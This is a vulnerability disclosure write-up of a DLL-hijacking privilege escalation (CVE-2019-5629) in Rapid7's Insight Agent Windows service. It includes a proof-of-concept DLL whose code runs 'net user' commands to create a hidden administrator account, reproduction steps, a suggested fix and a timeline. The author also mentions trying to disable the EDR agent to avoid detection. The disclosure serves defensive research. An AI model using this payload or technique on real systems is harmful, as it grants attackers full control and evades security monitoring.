With Insight IDR Rapid7 has created a very powerful, yet still easy to use Incident Detection and Response toolkit. During one of my latest assignments I found its Windows agent installed on my client’s systems.
While trying to disable it so that I can stay under the radar, I discovered a privilege escalation vulnerability in its Windows service. This vulnerability could be abused by any local user to gain full control over the affected system. It has been verified on a fully patched German Windows 10 x64 running Insight Agent v2.6.3.14. The issue has been fixed with version 2.6.5.
The underlying issue is that the ir_agent Windows Service, which is automatically started on system boot and runs with SYSTEM privileges, tries to load the DLL C:\DLLs\python3.dll
Although this path does not exist by default, it can be created by any local user. This is possible because the filesystem ACLs of the system drive allow anyone to create new subfolders.
With that knowledge, I created a new DLL that mimics the expected exports of the real python3.dll. However, instead of providing any of the expected functionality, it simply adds a new administrative user “attacker” to the system. You can download the full source here.
/* Implement DLLMain with common datatypes so we don't have to include windows.h. Otherwise this would cause several compile errors because of the already known but reexported functions. */ int DllMain(void* hinst, unsigned long* reason, void* reserved) { system("cmd /c \"date >> C:\\this_should_not_work.txt\""); system("net user attacker Batman42 /add"); system("net localgroup Administrators attacker /add"); system("net localgroup Administratoren attacker /add"); exit(1); return 0; } ...
After compiling it into a DLL I saved it (logically with a standard User account) as C:\DLLs\python3.dll.
After a reboot the DLL was loaded by the privileged Windows service ir_agent and the user attacker was created.
Proof of Concept
To confirm this issue yourself install the Insight IDR Windows Agent v2.6.3.14 (The issue has been fixed with version 2.6.5) and download the precompiled version of the malicious exploit DLL.
After that, as a non-admin user, create the folder C:\DLLs and place the library python3.dll therein. Now simply reboot the system. After that the new admin user attacker will be added. This proofs that full SYSTEM level access has been gained.
Suggested solution
All external dependencies should only be loaded from secure locations.
Timeline
- 22.5.2019: The issue has been identified, documented and reported
- 22.5.2019: The vulnerability has been confirmed by Rapid7
- 29.5.2019: Rapid7 released a new version (2.6.5) of the Insight agent that fixes this vulnerability. CVE-2019-5629 has been assigned.